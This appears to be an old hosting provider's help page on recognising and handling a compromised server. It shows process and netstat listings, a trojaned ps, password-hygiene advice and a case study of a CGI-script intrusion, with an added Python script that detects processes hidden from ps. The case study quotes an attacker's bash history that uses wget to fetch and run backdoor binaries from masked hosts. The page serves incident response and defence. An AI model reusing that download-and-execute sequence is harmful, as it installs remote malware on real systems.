It doesn't only happen to others. How do you tell that a machine has been hacked? A look at MRTG leaves little doubt:

[MRTG traffic graphs]

And on the machine itself we find:

```
root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]
root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
```

Obviously the hacker has been able to run programs as root. The machine is therefore compromised and must be reinstalled.

```
# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823
```

There are running programs which have a PID but are not shown by ps: almost certainly ps has been replaced by a trojaned ps that filters out all of the hacker's programs to fool the eye.

```
# halt
Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...
The system is going down for system halt NOW !!
```

We stop the machine immediately. With luck we have a SemiHackedMachine. Another case: HackedMachineExample.

Why was the machine hacked? The causes are many, but they can be summed up as follows: you are not paranoid.

- You use telnet. Your login and password travel across the Internet and can be 'stolen' at any time. You must use SSH; here is a guide: SshOnDedicated.
- You use FTP: your login and password travel across the Internet, and it's the same password as root. sftp is the solution.
- You use POP3/IMAP with a password, and it's the root password. Use APOP or POP3S/IMAPS; here is a guide: SmtpPop3Imap.
- If you don't update your server with the releases (ReleasePatch), you risk an easy hack (about 250 scans a day are carried out on our network looking for security holes).

What to do?

Once the machine is hacked, only one effective solution is left: reinstall it. The price is £90 + VAT and you start again with a freshly installed release on a new disk. If the box allows it, we put the previous disk in as secondary and mount it on /mmt (for 10 days).

Hack examples

1. CGI script fault

Symptoms

A g00dies.tgz file uploaded to /tmp together with other files: x, k, etc. The x program is a backdoor: once launched, it gives access to the server. We found the bash history of the nobody user in /tmp; here is its content:

```
cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x ./x ./x ./x./x ./x ./x ./x ./x
wget www.#######.com/k
chmod +x k
./k -d; /tmp/x
./x ./x ./x ./x ./x ./x ./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth
```

Comments

From this we can see that the commands were run as nobody, a user mainly used by Apache. It looks like the hacker exploited a vulnerability in a CGI script.

Resolution

- Kill all suspect running processes. The hacker is apparently not root (though he could have taken advantage of a kernel flaw in versions < 2.4.24); nevertheless we carry out some basic operations and checks:
- Then consult the Apache logs around the time of the hack to find the suspect script.
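The netstat-versus-ps check from the 28823/xc case above, written out as an added example (not code from this page): it parses `netstat -tanpu` and `ps auxw` listings, reports PIDs that own sockets but are missing from ps, and, when run live, compares the PIDs in /proc against `ps -eo pid=`. The sample listings in the block are constructed after the shape of the page's output and are not real captures; the function names are ours.

```python
"""Find processes that own sockets but are filtered out of `ps`, the symptom shown above."""
import os
import re
import subprocess

# Constructed samples modelled on the page's listings (PID 28823/xc hidden, sshd visible).
NETSTAT_SAMPLE = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3120/sshd
"""
PS_SAMPLE = """USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 3120 0.0 0.3 4200 1200 ? S 10:40 0:00 /usr/sbin/sshd
root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
"""

def socket_owners(netstat_output):
    """Map PID -> program for each netstat line ending in a PID/Program column."""
    owners = {}
    for line in netstat_output.splitlines():
        m = re.search(r"\b(\d+)/(\S+)\s*$", line)
        if m:
            owners[int(m.group(1))] = m.group(2)
    return owners

def visible_pids(ps_output):
    """PIDs reported by `ps auxw`-style output: second column, header skipped."""
    rows = (line.split() for line in ps_output.splitlines()[1:])
    return {int(cols[1]) for cols in rows if len(cols) > 1 and cols[1].isdigit()}

def hidden_socket_owners(netstat_output, ps_output):
    """Socket owners absent from ps; on the page's listing this is 28823/xc."""
    seen = visible_pids(ps_output)
    return {pid: prog for pid, prog in socket_owners(netstat_output).items() if pid not in seen}

def proc_not_in_ps():
    """Live check: PIDs present in /proc but missing from `ps -eo pid=`. Catches a
    trojaned ps binary only; a kernel-level rootkit hides from /proc too, so a clean
    result is necessary, not sufficient. Re-run it: processes that exit between the
    two reads show up once as false positives."""
    in_proc = {int(d) for d in os.listdir("/proc") if d.isdigit()}
    ps = subprocess.run(["ps", "-eo", "pid="], capture_output=True, text=True, check=True)
    return sorted(in_proc - {int(p) for p in ps.stdout.split()})

if __name__ == "__main__":
    print("sample, socket owners hidden from ps:", hidden_socket_owners(NETSTAT_SAMPLE, PS_SAMPLE))
    print("live, PIDs in /proc but not in ps:", proc_not_in_ps())
```

If either check turns up a PID, trust nothing the running system reports: the page's own advice of halting and examining the old disk from a clean install is the reliable path.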